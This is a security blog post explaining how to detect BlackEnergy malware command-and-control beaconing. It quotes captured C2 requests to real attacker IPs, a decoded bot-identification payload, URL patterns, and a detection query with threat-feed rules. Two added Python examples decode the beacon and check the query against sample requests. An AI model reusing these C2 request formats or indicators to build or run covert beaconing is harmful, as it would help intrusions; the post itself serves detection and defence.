Detecting BlackEnergy using Security Analytics

NortonSantos
2016-03-23 01:46 PM

BlackEnergy is a modular backdoor that can be used for several purposes, such as espionage and downloading destructive components to compromise target systems. The BlackEnergy malware family has been around since 2007, when it started as an HTTP-based botnet used for DDoS attacks.

It evolved into BlackEnergy2, a driver-based rootkit installed as a backdoor, and has since evolved into its latest version, BlackEnergy3, which is behind the recent attacks by cybercriminals against the Ukrainian electrical power industry.

The malware spreads mainly through targeted phishing e-mails carrying Microsoft Office attachments with malicious VBA macros.

BlackEnergy's modular architecture supports several plugins, which it uses to download and keep running both backdoors (such as variants of the Dropbear SSH backdoor) and various other plugins (such as KillDisk, a new destructive plugin used in the recent Ukraine attacks).

In this blog post, we will discuss how to detect its C2 beaconing activity.

Once the malware is installed on the target system, the backdoor listens for and communicates with the remote C2 server.

Following is an example of an HTTP request sent from the malware to the C2:

POST /Microsoft/Update/KC074913.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 5.149.254.114
Content-Length: 143
Connection: Keep-Alive

body=Yl9pZD1URVFVSUxBQk9PTUJPT01fODUwQjEzNTgwOUM5MThFMURFQzI2M0I2QTI3OTdBNzAmYl9nZW49cmVsZWFzZSZiX3Zlcj0yLjImb3Nfdj0yNjAwJm9zX3R5cGU9MA==

Here ‘body’ contains Base64-encoded data describing the bot and the operating system; decoded, it reads:

b_id=TEQUILABOOMBOOM_850B135809C918E1DEC263B6A2797A70&b_gen=release&b_ver=2.2&os_v=2600&os_type=0

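As an added example (not code from the post, and not an RSA or NetWitness tool), the following Python decodes a beacon body of this shape into its fields using only the standard library. The sample body is the one quoted above; the field names it reads (b_id, b_gen, b_ver, os_v, os_type) are the ones visible in the decoded payload, and the handling of percent-encoded padding and of a literal '+' in the Base64 is this example's own precaution rather than something the post describes.

```python
import base64
import binascii
from urllib.parse import parse_qs, parse_qsl

# POST body from the request quoted in the post (copied, not constructed).
SAMPLE_BODY = (
    "body=Yl9pZD1URVFVSUxBQk9PTUJPT01fODUwQjEzNTgwOUM5MThFMURFQzI2M0I2QTI3OTdBNzAmYl9nZW49"
    "cmVsZWFzZSZiX3Zlcj0yLjImb3Nfdj0yNjAwJm9zX3R5cGU9MA=="
)


def decode_beacon(raw_body):
    """Decode a 'body=<Base64>' beacon into a dict of its inner key=value fields.

    Returns None when the body is not shaped like this beacon: no 'body' parameter,
    Base64 that does not decode cleanly, or a payload without a bot id.
    """
    outer = parse_qs(raw_body, keep_blank_values=True)
    values = outer.get("body")
    if not values:
        return None
    # parse_qs percent-decodes the value (so '%3D' padding becomes '=') but also turns a
    # literal '+' into a space; '+' is part of the Base64 alphabet, so restore it.
    b64 = values[0].replace(" ", "+")
    try:
        # validate=True rejects characters outside the Base64 alphabet instead of
        # silently discarding them, so garbage never decodes to an empty payload.
        decoded = base64.b64decode(b64, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    fields = dict(parse_qsl(decoded, keep_blank_values=True))
    # Every beacon of this shape carries a bot id; without one this is not the format we parse.
    if "b_id" not in fields:
        return None
    return fields


def summarize_beacon(fields):
    """One-line summary of the decoded fields, e.g. for an analyst note."""
    wanted = ("b_id", "b_gen", "b_ver", "os_v", "os_type")
    return "bot {b_id} build={b_gen} version={b_ver} os_v={os_v} os_type={os_type}".format(
        **{k: fields.get(k, "?") for k in wanted}
    )


if __name__ == "__main__":
    fields = decode_beacon(SAMPLE_BODY)
    print(fields)
    print(summarize_beacon(fields))
```

Running the module prints the same key/value string that appears above, split into a dict; feeding it a body that is not Base64, or that lacks the `body` parameter, returns None instead of raising.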
Following is an example of a C2 response sent to the malware:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Mar 2015 09:44:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=5
X-Powered-By: PHP/5.3.3

dNkldvO6wOA1apbaR1y/RhcCeSIII2KqDjHRrHXwucC595zfWniFePywimQBVXr+WY80K6qE8qmQO65HvIczOuJdsBQ+bzwNQ8JsnqFDolhczofU9RQlhtoGt8Eb7HlY4s8=

The C2 response body is encrypted.

Different malware variants may use different directories or filenames in the URL, for example:

URL: http: //<ip address>:80/osupdate/getcfg.php
TYPE: POST
USER AGENT: iexplorer8.0

URL: http: //<ip address>:80/update/check.php
TYPE: POST
USER AGENT: iexplorer8.0

URL: http: //<ip address>/551/getcfg.php
TYPE: POST
USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)

Other samples can use HTTP CONNECT tunneling to connect through proxy servers, as can be seen in the following request:

CONNECT <ip address>:443 HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 5.79.80.166:443
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache

The screenshot below shows the network activity in RSA Security Analytics Investigator:

[Screenshot: BlackEnergy network activity as seen in RSA Security Analytics Investigator]

Assuming the appropriate meta keys are enabled, this post suggests the following query to detect the malware activity:

risk.info = 'http direct to ip request' &&
risk.info = 'http1.1 without connection header' &&
service=80 &&
extension=php &&
referer !exists &&
action=put && content='application/x-www-form-urlencoded'

This query is deliberately generic, since the directory and file names vary from sample to sample; it may therefore catch traffic that is suspicious but does not necessarily belong to BlackEnergy.

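To make the clauses of that query concrete, here is an added Python example (not code from the post, and not how NetWitness evaluates the query internally) that applies the same conditions to HTTP requests captured as raw text and reports which clause failed. The sample requests are constructed for this example and use the 192.0.2.0/24 documentation range rather than the addresses from the post. Two mappings are this example's assumptions: action=put is taken to mean an HTTP POST, and extension is read from the last path segment. Note that the request quoted earlier in the post carries a Connection header, so the 'http1.1 without connection header' clause would not match it; the second sample illustrates exactly that case.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample requests for this example (192.0.2.x are documentation addresses).
MATCHING_REQUEST = (
    "POST /osupdate/getcfg.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: iexplorer8.0\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Length: 13\r\n"
    "\r\n"
    "body=dGVzdA=="
)
# Same shape, but with the Connection header that the request quoted in the post also carries.
KEEPALIVE_REQUEST = MATCHING_REQUEST.replace(
    "Content-Length: 13\r\n", "Content-Length: 13\r\nConnection: Keep-Alive\r\n"
)
# Ordinary form post to an internal host: a hostname in Host and a Referer present.
BENIGN_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: intranet.example.com\r\n"
    "Referer: https://intranet.example.com/\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "\r\n"
    "user=alice"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, version, headers, body).

    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers, body


def host_is_ip_literal(host):
    """'http direct to ip request': the Host header names an IP address, not a domain."""
    if host.startswith("["):               # bracketed IPv6 literal, optionally with a port
        host = host[1:host.find("]")]
    elif host.count(":") == 1:             # IPv4 address or hostname followed by a port
        host = host.split(":", 1)[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def evaluate_query(raw):
    """Apply each clause of the post's query to one request.

    Returns (all_matched, {clause: matched}) so the failing clause is visible."""
    method, path, version, headers, body = parse_request(raw)
    filename = urlsplit(path).path.rsplit("/", 1)[-1]
    extension = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    content_type = headers.get("content-type", "").split(";")[0].strip().lower()
    clauses = {
        "risk.info = 'http direct to ip request'": host_is_ip_literal(headers.get("host", "")),
        "risk.info = 'http1.1 without connection header'":
            version == "HTTP/1.1" and "connection" not in headers,
        "service=80": version.startswith("HTTP/"),   # the session parsed as HTTP at all
        "extension=php": extension == "php",
        "referer !exists": "referer" not in headers,
        "action=put": method == "POST",               # assumption: action=put means an HTTP POST
        "content='application/x-www-form-urlencoded'":
            content_type == "application/x-www-form-urlencoded",
    }
    return all(clauses.values()), clauses


if __name__ == "__main__":
    samples = (("matching", MATCHING_REQUEST), ("keep-alive", KEEPALIVE_REQUEST),
               ("benign", BENIGN_REQUEST))
    for name, req in samples:
        matched, clauses = evaluate_query(req)
        failed = [c for c, ok in clauses.items() if not ok]
        print(f"{name}: {'MATCH' if matched else 'no match'} {failed}")
```

Running it shows the first sample matching every clause, the second failing only on the Connection header, and the benign intranet post failing on both the direct-to-IP and the missing-Referer clauses, which is where the query gets most of its selectivity against ordinary form submissions.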
Scan results for a BlackEnergy variant can be viewed here.

The full and complete BlackEnergy report can be found here.

All of the IOCs from those HTTP sessions were added to the following RSA FirstWatch Live feeds:

  • RSA FirstWatch APT Threat Domains
  • RSA FirstWatch APT Threat IPs

If the threat.desc meta key is enabled, you can use the following app rule:
threat.desc = 'apt-blackenergy-c2'
